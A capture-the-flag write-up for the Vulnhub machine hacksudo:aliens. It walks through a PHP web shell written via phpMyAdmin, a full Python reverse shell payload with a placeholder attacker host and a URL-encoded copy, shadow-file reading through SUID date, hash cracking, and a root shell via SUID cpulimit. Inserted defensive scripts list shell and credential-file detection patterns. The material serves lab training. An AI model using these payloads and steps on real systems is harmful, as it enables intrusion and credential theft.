Vulnhub hacksudo: aliens writeup

This is the write-up for hacksudo:aliens. The CTF machine is available for download here. Vishal Waghmare is the creator of this CTF.

Let’s begin with a full-port nmap scan to discover open ports. The target IP in my lab is 192.168.9.71. Command: sudo nmap -p- 192.168.9.71

open ports

Targeted nmap scan of ports 22, 80 and 9000. Command used: sudo nmap -sV -sC -p22,80,9000 192.168.9.71

Targeted nmap scan showing phpMyAdmin on port 9000

Directory enumeration on port 80 using gobuster.

gobuster dir --url http://192.168.9.71 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 25

/backup interesting directory
mysql.bak file.

Let’s download the mysql.bak file. It contains a set of credentials.

database credentials

The earlier nmap scan showed phpMyAdmin running on port 9000, and the credentials from mysql.bak let me log in there.

login into the phpMyAdmin port 9000

Navigating to the mysql database -> users table shows a few users along with their password hashes.

users and password hash

So the available users are root, phpmyadmin, shovon, hacksudo and vishal.

I spent a good amount of time trying to get shell access on this box through the phpMyAdmin web console, until I found a good article here. Following the article, I took the steps below.

  1. Click on New and create a new database. I named it shell_it.

new shell_it database.

  2. Now click on shell_it and use the SQL tab to write a file.

writing my_shell.php to /var/www/html

  3. Click on Go and execute the query. The message shows that the query was successful.

  4. Now visit the URL http://192.168.9.71/my_shell.php?cmd=id;hostname. We have command execution on the box.

Command execution

Time to get the reverse shell.

  1. Found the Python reverse shell payload here. The box has python3 installed, so I used the payload below, URL-encoded before passing it in the cmd parameter.

Plain payload (attacker-ip and port are placeholders for the listener):

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker-ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

URL-encoded form:

%70%79%74%68%6f%6e%33%20%2d%63%20%27%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%22%31%39%32%2e%31%36%38%2e%39%2e%33%22%2c%34%34%35%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%69%6d%70%6f%72%74%20%70%74%79%3b%20%70%74%79%2e%73%70%61%77%6e%28%22%2f%62%69%6e%2f%62%61%73%68%22%29%27

  2. Start a netcat listener on port 443 on the Kali machine.

URL + payload to get reverse shell

  3. Reverse shell received on port 443.

Reverse Shell
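From the defender's side, the reverse shell above leaves a very recognizable trace in the web server log: a request to a .php file whose cmd parameter, once URL-decoded, is an interpreter invocation or a chain of shell commands. The script below is an added example, not part of the write-up, that parses combined-format access log lines, decodes each query parameter itself (rather than with parse_qsl, which on some Python versions also splits on ';' and would break id;hostname into two parameters) and scores the decoded value against a few shell indicators. The log lines are constructed; the third one carries a shortened URL-encoded "python3 -c" fragment to show that decoding happens before matching.

```python
"""Flag command-injection attempts against a PHP web shell in an access log.

Added example, not from the original write-up. SAMPLE_LOG is constructed:
the IPs, timestamps, sizes and the shortened encoded payload are sample values.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Apache/nginx combined format: host ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Each pattern is one indicator class; a value's score is how many classes it trips.
SHELL_INDICATORS = (
    re.compile(r"\b(?:python3?|perl|php|ruby|nc|ncat|bash|sh)\s+-[a-zA-Z]"),  # interpreter + flag
    re.compile(r"/bin/(?:ba)?sh"),                                            # shell path
    re.compile(r"socket\.(?:socket|connect)"),                                # Python socket call
    re.compile(r"\b(?:id|whoami|hostname|uname|cat\s+/etc/(?:passwd|shadow))\b"),  # recon commands
    re.compile(r"[;|`]|\$\("),                                                # separators / substitution
)


def decode_query(target):
    """Return [(param, decoded_value)] for a request target, splitting on '&' only."""
    params = []
    for pair in urlsplit(target).query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.append((unquote_plus(key), unquote_plus(value)))
    return params


def score_value(value):
    """Number of indicator classes the decoded parameter value matches."""
    return sum(1 for rx in SHELL_INDICATORS if rx.search(value))


def find_injection_attempts(log_text, min_score=1):
    """Return [(ip, path, param, decoded_value, score)] for requests at or above min_score."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        for key, value in decode_query(target):
            score = score_value(value)
            if score >= min_score:
                hits.append((m.group("ip"), urlsplit(target).path, key, value, score))
    return hits


# Constructed sample: one benign page view, the id;hostname probe from the
# write-up, a shortened URL-encoded "python3 -c 'import socket'" and a benign search.
SAMPLE_LOG = """\
192.168.9.3 - - [10/Jun/2021:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
192.168.9.3 - - [10/Jun/2021:10:02:13 +0000] "GET /my_shell.php?cmd=id;hostname HTTP/1.1" 200 77
192.168.9.3 - - [10/Jun/2021:10:03:44 +0000] "GET /my_shell.php?cmd=%70%79%74%68%6f%6e%33%20%2d%63%20%27%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%27 HTTP/1.1" 200 0
192.168.9.50 - - [10/Jun/2021:10:05:00 +0000] "GET /search.php?q=python+tutorial HTTP/1.1" 200 2048
"""

if __name__ == "__main__":
    for ip, path, param, value, score in find_injection_attempts(SAMPLE_LOG):
        print(f"{ip} {path} {param}={value!r} score={score}")
```

Run it over /var/log/apache2/access.log (or feed it from a log shipper) and raise min_score to 2 if single-word false positives such as a search for "id" become noisy. Note that the request body of a POST is not logged, so this only catches parameters carried in the URL.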

We don’t have enough permissions as the www-data user. Basic enumeration with the find command for SUID binaries shows that date has the SUID bit set.

date with suid permission.

Privilege escalation to user hacksudo.

As per GTFOBins, we can read files if the SUID bit is set on the date binary.

Tried to read the /etc/shadow file and got the hash for the user hacksudo, then cracked it using john.

  1. Created a variable my_shadow with the value "/etc/shadow".
  2. Used /usr/bin/date -f $my_shadow to read the hashes.

root hash
hacksudo hash

  3. Copied the hacksudo hash into a file and used john to crack it with the rockyou.txt wordlist.

cracked hacksudo hash

Login as user hacksudo.

SSH login with user hacksudo

User Flag

user flag

Reading the .bash_history file as part of basic enumeration shows that cpulimit was run with /bin/bash -p as its argument. The find output also shows that cpulimit has the SUID bit set. Let’s use it to escalate privileges to root.

Root on hacksudo alien
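Both privilege escalations on this box, date with SUID to read /etc/shadow and cpulimit with SUID for a root shell, rest on the same misconfiguration: a binary that has no business being SUID. The script below is an added example, not code from the write-up, that compares the SUID files on a host against an approved baseline and additionally flags root-owned SUID files that are group- or world-writable. The baseline is an assumption (a trimmed Debian-family list; generate your own from a clean image), and SAMPLE_SUID is a constructed stand-in for the live scan's output so the logic runs without root.

```python
"""Audit SUID binaries against an approved baseline.

Added example, not from the original write-up. find_suid() mirrors
`find / -perm -4000 -type f`; SAMPLE_SUID is a constructed stand-in for its
output on the compromised host. SUID_BASELINE is an assumed, trimmed list for a
stock Debian/Ubuntu system: regenerate it from a known-good image of your own.
"""
import os
import stat
from collections import namedtuple

SuidFile = namedtuple("SuidFile", "path mode uid")

# Assumed baseline: binaries that legitimately ship SUID root on Debian-family systems.
SUID_BASELINE = frozenset({
    "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/passwd", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/pkexec", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
})

# Pseudo filesystems the live scan should not descend into.
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def find_suid(root="/"):
    """Live scan: yield a SuidFile for every regular file under root with the SUID bit set."""
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished; skip like find does with 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield SuidFile(path, st.st_mode, st.st_uid)


def classify(suid_files, baseline=SUID_BASELINE):
    """Return {'unexpected': [...], 'writable': [...]}.

    unexpected: SUID files absent from the baseline; each needs a justification
                (on this box the list would hold /usr/bin/date and /usr/bin/cpulimit).
    writable:   root-owned SUID files that are group- or world-writable, meaning
                any local user could replace a binary that runs as root.
    """
    report = {"unexpected": [], "writable": []}
    for f in suid_files:
        if f.path not in baseline:
            report["unexpected"].append(f.path)
        if f.uid == 0 and f.mode & (stat.S_IWGRP | stat.S_IWOTH):
            report["writable"].append(f.path)
    for key in report:
        report[key].sort()
    return report


# Constructed sample of find_suid() output on the compromised host.
# Modes are st_mode values: 0o104755 = regular file, SUID, rwxr-xr-x.
SAMPLE_SUID = [
    SuidFile("/usr/bin/sudo", 0o104755, 0),
    SuidFile("/usr/bin/su", 0o104755, 0),
    SuidFile("/usr/bin/passwd", 0o104755, 0),
    SuidFile("/usr/bin/mount", 0o104755, 0),
    SuidFile("/usr/bin/umount", 0o104755, 0),
    SuidFile("/usr/lib/openssh/ssh-keysign", 0o104755, 0),
    SuidFile("/usr/bin/date", 0o104755, 0),      # should never be SUID
    SuidFile("/usr/bin/cpulimit", 0o104755, 0),  # should never be SUID
    SuidFile("/opt/tool/helper", 0o104757, 0),   # constructed: SUID root and world-writable
]

if __name__ == "__main__":
    import sys
    live = len(sys.argv) > 1 and sys.argv[1] == "--live"
    files = list(find_suid("/")) if live else SAMPLE_SUID
    for kind, paths in classify(files).items():
        for p in paths:
            print(f"{kind}: {p}")
```

Run with --live on a real host to scan the filesystem; anything under unexpected should be stripped of the bit (chmod u-s) unless someone can say why it needs it, and the baseline should be kept under version control so drift shows up in review.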

There is another way to get the hacksudo user on this box. Since we discovered the users root, phpmyadmin, shovon, hacksudo and vishal through the phpMyAdmin console, in the background I ran hydra to brute-force SSH logins for those users and succeeded as hacksudo.

Tools used:

  1. nmap
  2. hydra
  3. curl
  4. john

References:

  1. https://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/
  2. https://gtfobins.github.io/gtfobins/date/#suid